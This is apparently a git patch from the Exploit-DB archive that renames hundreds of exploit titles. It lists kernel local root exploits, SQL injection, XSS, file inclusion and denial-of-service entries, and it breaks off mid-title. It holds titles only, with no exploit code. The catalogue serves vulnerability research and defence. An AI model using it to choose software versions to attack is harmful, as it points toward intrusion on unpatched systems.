From 1b40ae09d7a5d357a704fbc7c8eb57f9f531368c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 2 Aug 2016 05:08:00 +0000 Subject: [PATCH] DB: 2016-08-02 4 new exploits ProFTPD 1.2.7 < 1.2.9rc2 - Remote Root & brute-force Exploit ProFTPD 1.2.7 < 1.2.9rc2 - Remote Root / brute-force Exploit Linux Kernel 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (1) Linux Kernel 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (2) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (1) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (2) Linux Kernel 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3) Linux Kernel 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Validator (Proof of Concept) (1) Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (Proof of Concept) (1) Linux Kernel 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Local Root Exploit (2) Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Local Root Exploit (2) Symantec Multiple Firewall DNS Response Denial of Service Symantec Multiple Firewall - DNS Response Denial of Service Lexmark Multiple HTTP Servers Denial of Service Lexmark Multiple HTTP Servers - Denial of Service BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit BadBlue 2.52 Web Server - Multiple Connections Denial of Service Exploit Linux Kernel 2.4.28 / <= 2.6.9 - scm_send Local DoS Exploit Linux Kernel 2.4.28 / 2.6.9 - scm_send Local DoS Exploit Linux Kernel 2.6.9 / <= 2.4.28 - vc_resize int Local Overflow Exploit Linux Kernel 2.6.9 / <= 2.4.28 - Memory Leak Local DoS Linux Kernel 2.6.9 / <= 2.4.28 - ip_options_get Local Overflow Linux Kernel 2.4.28 / 2.6.9 - vc_resize int Local Overflow Exploit Linux Kernel 2.4.28 / 2.6.9 - Memory Leak Local DoS Linux Kernel 2.4.28 / 2.6.9 - ip_options_get Local Overflow Linux Kernel 2.6.9 / <= 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Local Root Exploit Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Local Root Exploit WebWiz Products 1.0 / <= 3.06 - Login Bypass SQL Injection Exploits WebWiz Products 1.0 / 3.06 - Login Bypass SQL Injection Exploits Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure / Denial of Service Exploit Fast Click 1.1.3 / <= 2.3.8 - (show.php) Remote File Inclusion Exploit Fast Click 1.1.3 / 2.3.8 - (show.php) Remote File Inclusion Exploit Newsscript 0.5 - Remote and Local File Inclusion Newsscript 0.5 - Remote File Inclusion / Local File Inclusion Invision Gallery 2.0.7 ReadFile() & SQL Injection Exploit (linux) Invision Gallery 2.0.7 ReadFile() & SQL Injection Exploit (Linux) X-Cart ? Multiple Remote File Inclusion X-Cart - Multiple Remote File Inclusion Rayzz Script 2.0 - Remote / Local File Inclusion Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion QuickTime 7.4.1 QTPlugin.ocx Multiple Stack Overflow Vulnerabilities QuickTime 7.4.1 - QTPlugin.ocx Multiple Stack Overflow Vulnerabilities LookStrike Lan Manager 0.9 - Remote / Local File Inclusion LookStrike Lan Manager 0.9 - Remote File Inclusion / Local File Inclusion CMS WebManager-Pro Multiple SQL Injection CMS WebManager-Pro - Multiple SQL Injection Facil-CMS 0.1RC Multiple Local File Inclusion Facil-CMS 0.1RC - Multiple Local File Inclusion Bea Weblogic Apache Connector - Code Execution and Denial of Service Exploit Bea Weblogic Apache Connector - Code Execution / Denial of Service Exploit Nuked-klaN 1.7.7 / <= SP4.4 - Multiple Vulnerabilities Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities CafeEngine Multiple SQL Injection CafeEngine - Multiple SQL Injection A-Link WL54AP3 and WL54AP2 - CSRF + XSS A-Link WL54AP3 and WL54AP2 - CSRF / XSS GS Real Estate Portal Multiple SQL Injection GS Real Estate Portal - Multiple SQL Injection FloSites Blog Multiple SQL Injection FloSites Blog - Multiple SQL Injection ASP PORTAL Multiple SQL Injection ASP PORTAL - Multiple SQL Injection Simple Machines Forum 1.0.13 / <= 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass Simple Machines Forum 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass Pligg 9.9.5 - CSRF Protection Bypass and Captcha Bypass Pligg 9.9.5 - CSRF Protection Bypass / Captcha Bypass Demium CMS 0.2.1b - Multiple Vulnerabilities and Exploit Demium CMS 0.2.1b - Multiple Vulnerabilities Linux Kernel 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit Linux Kernel 2.6.20 / 2.6.24 / 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit AudioPLUS 2.00.215 - (.lst & .m3u) Local Buffer Overflow (seh) AudioPLUS 2.00.215 - (.lst & .m3u) Local Buffer Overflow (SEH) Linux Kernel 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit Linux Kernel 2.6.24_16-23 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit jetty 6.x < 7.x - XSS & Information Disclosure & Injection jetty 6.x < 7.x - XSS / Information Disclosure / Injection OpenDocMan 1.2.5 - XSS & SQL injection OpenDocMan 1.2.5 - XSS / SQL injection Alteon OS BBI (Nortell) - (XSS and CSR) Multiple Vulnerabilities Alteon OS BBI (Nortell) - XSS / CSR Micronet SP1910 Data Access Controller UI XSS & HTML Code Injection Micronet SP1910 Data Access Controller UI - XSS / HTML Code Injection Kide Shoutbox 0.4.6 - XSS & AXFR Kide Shoutbox 0.4.6 - XSS / AXFR PHP-Nuke 8.0 - XSS & HTML Code Injection in News Module PHP-Nuke 8.0 - XSS / HTML Code Injection in News Module Invision Power Board 3.0.4 / <= 3.0.4 / <= 2.3.6 - LFI / SQL Injection Invision Power Board 3.0.4 / 3.0.4 / 2.3.6 - LFI / SQL Injection oBlog - Persistant XSS & CSRF & Admin Bruteforce oBlog - Persistant XSS / CSRF / Admin Bruteforce WP-Forum 2.3 - SQL Injection & Blind SQL Injection WP-Forum 2.3 - SQL Injection / Blind SQL Injection QuickEStore 7.9 - SQL Injection and Path Diclosure Download QuickEStore 7.9 - SQL Injection / Path Diclosure Download dotProject 2.1.3 - XSS and Improper Permissions dotProject 2.1.3 - XSS / Improper Permissions MOJO's IWms 7 SQL Injection & Cross-Site Scripting MOJO's IWms 7 - SQL Injection / Cross-Site Scripting Cisco Collaboration Server 5 - XSS & Source Code Disclosure Cisco Collaboration Server 5 - XSS / Source Code Disclosure cPanel Multiple CSRF Vulnerabilities cPanel - Multiple CSRF Vulnerabilities (Tod Miller's) Sudo/SudoEdit <= 1.6.9p21 / <= 1.7.2p4 - Local Root Exploit (Tod Miller's) Sudo/SudoEdit 1.6.9p21 / 1.7.2p4 - Local Root Exploit SiteDone Custom Edition 2.0 - SQL Injection & XSS SiteDone Custom Edition 2.0 - SQL Injection / XSS TSOKA:CMS 1.1 & 1.9 & 2.0 - SQL Injection & XSS TSOKA:CMS 1.1 & 1.9 & 2.0 - SQL Injection / XSS Centreon IT & Network Monitoring 2.1.5 - Injection SQL Centreon IT & Network Monitoring 2.1.5 - SQL Injection ilchClan 1.0.5 - (cid) SQL Injection & Exploit ilchClan 1.0.5 - (cid) SQL Injection joelz bulletin board 0.9.9rc3 - Multiple SQL Injection & Exploit joelz bulletin board 0.9.9rc3 - Multiple SQL Injection 2DayBiz Advanced Poll Script - XSS and Authentication Bypass 2DayBiz Advanced Poll Script - XSS / Authentication Bypass Socialware 2.2 - Upload and XSS Socialware 2.2 - Upload / XSS Waibrasil Remote / Local File Inclusion Waibrasil - Remote File Inclusion / Local File Inclusion I-Vision CMS - XSS & SQL Injection I-Vision CMS - XSS / SQL Injection phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting and Full Path phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path 3Com* iMC (Intelligent Management Center) - Various XSS and Information Disclosure Flaws 3Com* iMC (Intelligent Management Center) - XSS / Information Disclosure Flaws WmsCMS - XSS & SQL Injection iScripts eSwap 2.0 - SQLi and XSS WmsCMS - XSS / SQL Injection iScripts eSwap 2.0 - SQLi / XSS reVou Twitter Clone 2.0 Beta - SQL Injection and XSS JForum 2.1.8 bookmarks CSRF & XSS reVou Twitter Clone 2.0 Beta - SQL Injection / XSS JForum 2.1.8 bookmarks CSRF / XSS eLms Pro - SQLi and XSS PGAUTOPro - SQLi and XSS eLms Pro - SQLi / XSS PGAUTOPro - SQLi / XSS Joomla 1.5 Jreservation Component - SQLi And XSS Joomla 1.5 Jreservation Component - SQLi / XSS Science Fair In A Box - SQLi & XSS Science Fair In A Box - SQLi / XSS PHP Property Rental Script - SQLi & XSS PHP Property Rental Script - SQLi / XSS SchoolMation 2.3 - SQLi and XSS SchoolMation 2.3 - SQLi / XSS UTStats - XSS & SQL Injection & Full path disclosure UTStats - XSS / SQL Injection / Full path disclosure SimpleAssets Authentication Bypass & XSS SimpleAssets Authentication Bypass / XSS InterScan Web Security 5.0 - Arbitrary File Upload & Local Privilege Escalation InterScan Web Security 5.0 - Arbitrary File Upload / Local Privilege Escalation ARSC Really Simple Chat 3.3 - Remote File Inclusion & XSS ARSC Really Simple Chat 3.3 - Remote File Inclusion / XSS Pre Multi-Vendor Shopping Malls SQL Injection & Auth Bypass Pre Multi-Vendor Shopping Malls SQL Injection / Auth Bypass Zylone IT Multiple Blind SQL Injection Zylone IT - Multiple Blind SQL Injection vBulletin 3.8.4 & 3.8.5 Registration Bypass vBulletin 3.8.4 / 3.8.5 Registration Bypass JaWiki 'versionNo' Parameter Cross Site Scripting JaWiki 'versionNo' Parameter Cross-Site Scripting 411cc Multiple SQL Injection 411cc - Multiple SQL Injection MantisBT 1.2.3 (db_type) - Cross-Site Scripting & Path Disclosure MantisBT 1.2.3 (db_type) - Cross-Site Scripting / Path Disclosure OpenEMR 3.2.0 - SQL Injection and XSS OpenEMR 3.2.0 - SQL Injection / XSS F3Site 2011 alfa 1 - (XSS & CSRF) Multiple Vulnerabilities phpMySport 1.4 - (SQLi & Auth Bypass & Path Disclosure) Multiple Vulnerabilities F3Site 2011 alfa 1 - (XSS / CSRF) Multiple Vulnerabilities phpMySport 1.4 - SQLi / Auth Bypass / Path Disclosure WordPress Plugin BackWPup - Remote and Local Code Execution WordPress Plugin BackWPup - Remote Code Execution /Local Code Execution Planex Mini-300PU & Mini100s Cross-Site Scripting Planex Mini-300PU & Mini100s - Cross-Site Scripting TinyBB 1.4 - Blind SQL Injection and Path Disclosure TinyBB 1.4 - Blind SQL Injection / Path Disclosure Linux Kernel 2.6.28 / <= 3.0 (DEC Alpha Linux) - Local Root Exploit Linux Kernel 2.6.28 / 3.0 (DEC Alpha Linux) - Local Root Exploit If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (Metasploit) (2) If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (Metasploit) (2) Webcat Multiple Blind SQL Injection Webcat - Multiple Blind SQL Injection Banana Dance CMS and Wiki SQL Injection Banana Dance CMS and Wiki - SQL Injection SMF 2.0.1 - SQL Injection & Privilege Escalation SMF 2.0.1 - SQL Injection / Privilege Escalation Linux/x86 - Polymorphic Shellcode setuid(0) + setgid(0) + add user _iph_ without password to /etc/passwd Linux/x86 - Polymorphic Shellcode setuid(0) + setgid(0) + add user _iph_ without password to /etc/passwd Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities phpList 2.10.17 - SQL Injection and XSS phpList 2.10.17 - SQL Injection / XSS vBshop Multiple Persistent XSS Vulnerabilities vBshop - Multiple Persistent XSS Vulnerabilities ArticleSetup Multiple Persistence Cross-Site Scripting and SQL Injection ArticleSetup - Multiple Persistence Cross-Site Scripting / SQL Injection Serendipity 1.6 - Backend XSS And SQLi Serendipity 1.6 - Backend XSS / SQLi Wireshark Multiple Dissector Denial of Service Vulnerabilities Wireshark - Multiple Dissector Denial of Service Vulnerabilities Useresponse 1.0.2 - Privilege Escalation & RCE Exploit Useresponse 1.0.2 - Privilege Escalation / RCE Exploit Linux Kernel 2.2/2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options Linux Kernel 2.2 / 2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options AlienVault OSSIM 3.1 - Reflected XSS and Blind SQL Injection Spiceworks 5.3.75941 - Stored XSS and Post-Auth SQL Injection AlienVault OSSIM 3.1 - Reflected XSS / Blind SQL Injection Spiceworks 5.3.75941 - Stored XSS / Post-Auth SQL Injection T-dah Webmail CSRF & Stored XSS T-dah Webmail - CSRF / Stored XSS XODA Document Management System 0.4.5 - XSS & Arbitrary File Upload XODA Document Management System 0.4.5 - XSS / Arbitrary File Upload WireShark 1.8.2 & 1.6.0 - Buffer Overflow PoC (0Day) WireShark 1.8.2 / 1.6.0 - Buffer Overflow PoC (0Day) businesswiki 2.5rc3 - Stored XSS & arbitrary file upload businesswiki 2.5rc3 - Stored XSS / arbitrary file upload SpyNet 6.5 Chat Server Multiple Connection Denial of Service SpyNet 6.5 Chat Server - Multiple Connection Denial of Service Exploit: NCMedia Sound Editor Pro 7.5.1 - (SEH + DEP Bypass) NCMedia Sound Editor Pro 7.5.1 - (SEH + DEP Bypass) Mozilla Bonsai Multiple Cross-Site Scripting Vulnerabilities Mozilla Bonsai - Multiple Cross-Site Scripting Vulnerabilities airVisionNVR 1.1.13 readfile() Disclosure and SQL Injection airVisionNVR 1.1.13 - readfile() Disclosure / SQL Injection BRS WebWeaver 1.0 4 POST and HEAD Denial of Service BRS WebWeaver 1.0 4 - POST and HEAD Denial of Service Caucho Resin 2.0/2.1 - Multiple HTML Injection and Cross-Site Scripting Vulnerabilities Caucho Resin 2.0/2.1 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities MyDms 1.4 - SQL Injection And Directory Traversal MyDms 1.4 - SQL Injection / Directory Traversal D-Link DIR-600 and DIR-300 - (rev B) Multiple Vulnerabilities D-Link DIR-600 and DIR-300 (rev B) - Multiple Vulnerabilities D'Link DIR-615 Hardware rev D3 / DIR-300 - Hardware rev A Multiple Vulnerabilities D'Link DIR-615 Hardware rev D3 / DIR-300 Hardware rev A - Multiple Vulnerabilities Linux Kernel 2.6.x (RHEL4 <= 2.6.9 / <= 2.6.11) - SYS_EPoll_Wait Local Integer Overflow Local Root (2) Linux Kernel 2.6.9 /2.6.11 (RHEL4) - SYS_EPoll_Wait Local Integer Overflow Local Root (2) Linux Kernel 2.4.30 / <= 2.6.11.5 - Bluetooth bluez_sock_create Local Root Linux Kernel 2.4.30 / 2.6.11.5 - Bluetooth bluez_sock_create Local Root CKEditor < 4.1 - Persistent XSS WYSIWYG module Drupal 6.x & 7.x CKEditor < 4.1WYSIWYG module Drupal 6.x & 7.x - Persistent XSS OSTicket 1.2/1.3 - Multiple Input Validation and Remote Code Injection Vulnerabilities OSTicket 1.2/1.3 - Multiple Input Validation / Remote Code Injection Vulnerabilities Calendarix 0.8.20071118 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities MyBB - Multiple Cross-Site Scripting and SQL Injection Calendarix 0.8.20071118 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities MyBB - Multiple Cross-Site Scripting / SQL Injection YaPiG 0.9x - Remote and Local File Inclusion YaPiG 0.9x - Remote File Inclusion / Local File Inclusion ATutor 1.4.3 tile.php Multiple Parameter XSS ATutor 1.4.3 - tile.php Multiple Parameter XSS CarLine Forum Russian Board 4.2 menu_footer.php Multiple Parameter XSS CarLine Forum Russian Board 4.2 - menu_footer.php Multiple Parameter XSS CarLine Forum Russian Board 4.2 menu_header.php Multiple Parameter XSS CarLine Forum Russian Board 4.2 menu_tema.php Multiple Parameter XSS CarLine Forum Russian Board 4.2 - menu_header.php Multiple Parameter XSS CarLine Forum Russian Board 4.2 - menu_tema.php Multiple Parameter XSS CarLine Forum Russian Board 4.2 reply.php Multiple Parameter XSS CarLine Forum Russian Board 4.2 - reply.php Multiple Parameter XSS CarLine Forum Russian Board 4.2 new.php Multiple Parameter XSS CarLine Forum Russian Board 4.2 edit_msg.php Multiple Parameter XSS CarLine Forum Russian Board 4.2 - new.php Multiple Parameter XSS CarLine Forum Russian Board 4.2 - edit_msg.php Multiple Parameter XSS CarLine Forum Russian Board 4.2 reply_in.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - reply_in.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 memory.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 line.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 in.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 enter.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - memory.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - line.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - in.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - enter.php Multiple Parameter SQL Injection ASPNuke 0.80 register.asp Multiple Parameter XSS ASPNuke 0.80 - register.asp Multiple Parameter XSS Binary Board System 0.2.5 reply.pl Multiple Parameter XSS Binary Board System 0.2.5 stats.pl Multiple Parameter XSS Binary Board System 0.2.5 - reply.pl Multiple Parameter XSS Binary Board System 0.2.5 - stats.pl Multiple Parameter XSS ZixForum 1.12 Forum.ASP Multiple SQL Injection ZixForum 1.12 - Forum.ASP Multiple SQL Injection QNX 6.2/6.3 - Multiple Local Privilege Escalation and Denial of Service Vulnerabilities QNX 6.2/6.3 - Multiple Local Privilege Escalation / Denial of Service Vulnerabilities Web-APP.net WebAPP 0.9.x index.cgi Multiple Parameter XSS Web-APP.net WebAPP 0.9.x - index.cgi Multiple Parameter XSS IntelliLink Pro 5.06 edit.cgi Multiple Parameter XSS IntelliLink Pro 5.06 - edit.cgi Multiple Parameter XSS xFlow 5.46.11 index.cgi Multiple Parameter SQL Injection xFlow 5.46.11 index.cgi Multiple Parameter XSS xFlow 5.46.11 - index.cgi Multiple Parameter SQL Injection xFlow 5.46.11 - index.cgi Multiple Parameter XSS zenphoto 0.9/1.0 index.php Multiple Parameter XSS zenphoto 0.9/1.0 - index.php Multiple Parameter XSS ATutor 1.5.x create_course.php Multiple Parameter XSS ATutor 1.5.x - create_course.php Multiple Parameter XSS BlaBla 4U Multiple Cross-Site Scripting Vulnerabilities BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities Apache HTTP Server 1.3.35 / <= 2.0.58 / <= 2.2.2 - Arbitrary HTTP Request Headers Security Weakness Apache HTTP Server 1.3.35 / 2.0.58 / 2.2.2 - Arbitrary HTTP Request Headers Security Weakness WWWThreads 5.4 Cat Parameter Multiple Cross-Site Scripting Vulnerabilities WWWThreads 5.4 - Cat Parameter Multiple Cross-Site Scripting Vulnerabilities AckerTodo 4.2 Login.php Multiple SQL Injection AckerTodo 4.2 - Login.php Multiple SQL Injection ac4p Mobile index.php Multiple Parameter XSS ac4p Mobile MobileNews.php Multiple Parameter XSS ac4p Mobile - index.php Multiple Parameter XSS ac4p Mobile - MobileNews.php Multiple Parameter XSS ac4p Mobile up.php Multiple Parameter XSS ac4p Mobile - up.php Multiple Parameter XSS AShop Deluxe 4.5 ashop/catalogue.php Multiple Parameter XSS AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter XSS AShop Deluxe 4.5 shipping.php Multiple Parameter XSS AShop Deluxe 4.5 - shipping.php Multiple Parameter XSS 212cafeBoard Multiple Cross-Site Scripting Vulnerabilities 212cafeBoard - Multiple Cross-Site Scripting Vulnerabilities Coppermine Photo Gallery 1.4.10 - Multiple Remote And Local File Inclusion Coppermine Photo Gallery 1.4.10 - Multiple Remote File Inclusion / Local File Inclusion Atom PhotoBlog 1.0.1/1.0.9AtomPhotoBlog.php Multiple Input Validation Vulnerabilities Atom PhotoBlog 1.0.1/1.0.9 - AtomPhotoBlog.php Multiple Input Validation Vulnerabilities PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass and Multiple SQL Injection PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injection WordPress Plugin DZS Video Gallery 3.1.3 - Remote and Local File Disclosure WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure ACG News 1.0 index.php Multiple SQL Injection ACG News 1.0 - index.php Multiple SQL Injection Add a link 4 - Security Bypass and SQL Injection Add a link 4 - Security Bypass / SQL Injection AlienVault OSSIM SQL Injection and Remote Code Execution AlienVault OSSIM - SQL Injection / Remote Code Execution bttlxe Forum 2.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities bttlxe Forum 2.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities Neuron News 1.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities Neuron News 1.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities Clever Copy 3.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities Clever Copy 3.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities Cells Blog 3.3 - XSS Reflected & Blind SQLite Injection Cells Blog 3.3 - XSS Reflected / Blind SQLite Injection ProjectPier 0.8 - Multiple HTML Injection and Cross-Site Scripting Vulnerabilities ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities MyBlog 1.x - SQL Injection and Remote File Inclusion MyBlog 1.x - SQL Injection / Remote File Inclusion PHP Classifieds 6.20 - Multiple Cross-Site Scripting and Authentication Bypass Vulnerabilities PHP Classifieds 6.20 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities Kloxo - SQL Injection and Remote Code Execution Kloxo - SQL Injection / Remote Code Execution PHP Address Book 3.1.5 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities PHP Address Book 3.1.5 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting and Arbitrary File Upload GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting / Arbitrary File Upload couponPHP CMS 1.0 - Multiple Stored XSS and SQL Injection couponPHP CMS 1.0 - Multiple Stored XSS / SQL Injection EasyDynamicPages 3.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities EasyPublish 3.0 - 'read' Parameter Multiple SQL Injection and Cross-Site Vulnerabilities EasyDynamicPages 3.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities EasyPublish 3.0 - 'read' Parameter Multiple SQL Injection / Cross-Site Scripting EasyE-Cards 3.10 - (SQL Injection and Cross-Site Scripting) Multiple Vulnerabilities EasyE-Cards 3.10 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities dotProject 2.1.2 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities dotProject 2.1.2 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities @Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting Vulnerabilities @Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting DHCart 3.84 - Multiple Cross-Site Scripting And HTML Injection Vulnerabilities DHCart 3.84 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities KDE Konqueror 4.1 - Multiple Cross-Site Scripting and Denial of Service Vulnerabilities KDE Konqueror 4.1 - Multiple Cross-Site Scripting / Denial of Service Vulnerabilities 4CMS - SQL Injection and Local File Inclusion 4CMS - SQL Injection / Local File Inclusion PTCeffect 4.6 - LFI & SQL Injection PTCeffect 4.6 - LFI / SQL Injection 010 Editor 3.0.4 File Parsing Multiple Buffer Overflow Vulnerabilities 010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities DWebPro 6.8.26 - Directory Traversal and Arbitrary File Disclosure DWebPro 6.8.26 - Directory Traversal / Arbitrary File Disclosure Kingsoft Webshield 1.1.0.62 - Cross-Site scripting and Remote Command Execution Kingsoft Webshield 1.1.0.62 - Cross-Site scripting / Remote Command Execution LxBlog Multiple Cross-Site Scripting and SQL Injection LxBlog Multiple Cross-Site Scripting / SQL Injection Joomla! < 1.5.11 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities Joomla! < 1.5.11 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities PhotoPost PHP 3.3.1 - 'cat' Parameter Cross-Site Scripting and SQL Injection PhotoPost PHP 3.3.1 - 'cat' Parameter Cross-Site Scripting / SQL Injection Natychmiast CMS - Multiple Cross-Site Scripting and SQL Injection Natychmiast CMS - Multiple Cross-Site Scripting / SQL Injection e107 0.7.x - ('CAPTCHA' Security Bypass and Cross-Site Scripting) Multiple Vulnerabilities e107 0.7.x - ('CAPTCHA' Security Bypass / Cross-Site Scripting) Multiple Vulnerabilities Achievo 1.x - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities Dream Poll 3.1 - 'index.php' Cross-Site Scripting and SQL Injection Achievo 1.x - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities Dream Poll 3.1 - 'index.php' Cross-Site Scripting / SQL Injection Pentaho BI 1.x - Multiple Cross-Site Scripting and Information Disclosure Vulnerabilities Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities Oracle E-Business Suite 11i Multiple Remote Vulnerabilities Oracle E-Business Suite 11i - Multiple Remote Vulnerabilities Photokorn 1.542 - Cross-Site Scripting and Remote File Inclusion Photokorn 1.542 - Cross-Site Scripting / Remote File Inclusion dotProject 2.1.3 - Multiple SQL Injection and HTML Injection Vulnerabilities dotProject 2.1.3 - Multiple SQL Injection / HTML Injection Vulnerabilities Linux Kernel 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3) Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3) Kempt SiteDone 2.0 - 'detail.php' Cross-Site Scripting and SQL Injection Kempt SiteDone 2.0 - 'detail.php' Cross-Site Scripting / SQL Injection Lunar CMS 3.3 - CSRF And Stored XSS Lunar CMS 3.3 - CSRF / Stored XSS NovaSTOR NovaNET 11.0 - Remote DoS and arbitrary memory read NovaSTOR NovaNET 11.0 - Remote DoS / arbitrary memory read NolaPro Enterprise 4.0.5538 - Cross-Site Scripting and SQL Injection NolaPro Enterprise 4.0.5538 - Cross-Site Scripting / SQL Injection Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting and SQL Injection Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting / SQL Injection Omeka 2.2 - CSRF And Stored XSS Omeka 2.2 - CSRF / Stored XSS Oxwall 1.7.0 - Multiple CSRF And HTML Injection Vulnerabilities Oxwall 1.7.0 - Multiple CSRF / HTML Injection Vulnerabilities SkaDate Lite 2.0 - Multiple CSRF And Persistent XSS Vulnerabilities SkaDate Lite 2.0 - Multiple CSRF / Persistent XSS Vulnerabilities Disqus for WordPress 2.7.5 - Admin Stored CSRF and XSS Disqus for WordPress 2.7.5 - Admin Stored CSRF / XSS PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting and HTML Injection Vulnerabilities PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection Vulnerabilities Cetera eCommerce Multiple Cross-Site Scripting and HTML Injection Vulnerabilities Cetera eCommerce - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities Allinta CMS 22.07.2010 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities Allinta CMS 22.07.2010 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities Nagios XI Multiple Cross-Site Request Forgery Vulnerabilities Nagios XI 0 Multiple Cross-Site Request Forgery Vulnerabilities JBoard Multiple Cross-Site Scripting and SQL Injection JBoard Multiple Cross-Site Scripting / SQL Injection ServletExec - (Directory Traversal and Authentication-Bypass) Multiple Vulnerabilities ServletExec - (Directory Traversal / Authentication-Bypass) Multiple Vulnerabilities 123 Flash Chat Multiple Security Vulnerabilities 123 Flash Chat = Multiple Security Vulnerabilities CompuCMS - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities CompuCMS - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities Briefcase 4.0 iOS - Code Execution & File Include Briefcase 4.0 iOS - Code Execution / File Include Million Dollar Pixel Ads Cross-Site Scripting and SQL Injection Million Dollar Pixel Ads Cross-Site Scripting / SQL Injection PluXml 5.0.1 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities PluXml 5.0.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities AdvertisementManager 3.1 - 'req' Parameter Local and Remote File Inclusion AdvertisementManager 3.1 - 'req' Parameter Local File Inclusion / Remote File Inclusion CMS WebManager-Pro 7.4.3 - Cross-Site Scripting and SQL Injection CMS WebManager-Pro 7.4.3 - Cross-Site Scripting / SQL Injection Centreon SQL and Command 